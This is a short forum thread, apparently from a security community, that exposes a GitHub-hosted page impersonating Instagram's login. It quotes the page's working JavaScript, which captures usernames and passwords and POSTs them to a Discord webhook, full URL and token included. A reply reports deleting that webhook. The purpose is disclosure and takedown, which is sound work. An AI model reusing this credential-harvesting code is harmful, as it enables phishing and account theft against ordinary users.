Instagram Phishing Site, Credentials sent through a Discord webhook

WeDoALittleTrolling · October 31, 2021, 7:18pm

https://helpingto.github.io/you.github.io/

This is a GitHub page impersonating an Instagram login page
Person’s GitHub Account: https://github.com/helpingto (the source for the phishing site is publicly available, bruh)

Credentials are sent by a POST requests to https://discord.com/api/webhooks/901767746667298856/SehdolTZQxevV4naX26MEBrjfdmkw1l7wOeK_Y0QrnoasbvPa-nVRs269qYrqBGslZ-Q.

  function sendMessage() {
  function sleep(milliseconds) {
  const date = Date.now();
  let currentDate = null;
  do {
    currentDate = Date.now();
  } while (currentDate - date < milliseconds);
}
    var request = new XMLHttpRequest();
    request.open("POST", "https://discord.com/api/webhooks/901767746667298856/SehdolTZQxevV4naX26MEBrjfdmkw1l7wOeK_Y0QrnoasbvPa-nVRs269qYrqBGslZ-Q");
    request.setRequestHeader('Content-type', 'application/json');
    var params = {
      content: ("> **USERNAME  : **" + document.getElementById('username').value + "\n> **PASSWORD : **" + document.getElementById('password').value)
    }
    request.send(JSON.stringify(params));
	sleep(400)
	window.location.replace("https://www.instagram.com/upscworldofficial/");
  }

I’m guessing that once the credentials are sent, the person who created the phishing site recieves the credentials on their Discord server via the webhook.

CrellerNetworks · October 31, 2021, 10:42pm

best way to piss them off

WeDoALittleTrolling · November 1, 2021, 2:17am

Update:
After having a look at the docs for Discord webhooks, I found that the webhook could be deleted as the person running the site essentially leaked his webhook id 901767746667298856 and token SehdolTZQxevV4naX2treq6MEBrjfdmkw1l7wOeK_Y0QrnoasbvPa-nVRs269qYrqBGslZ-Q

So now, even if people send their creds over, the person cannot recieve them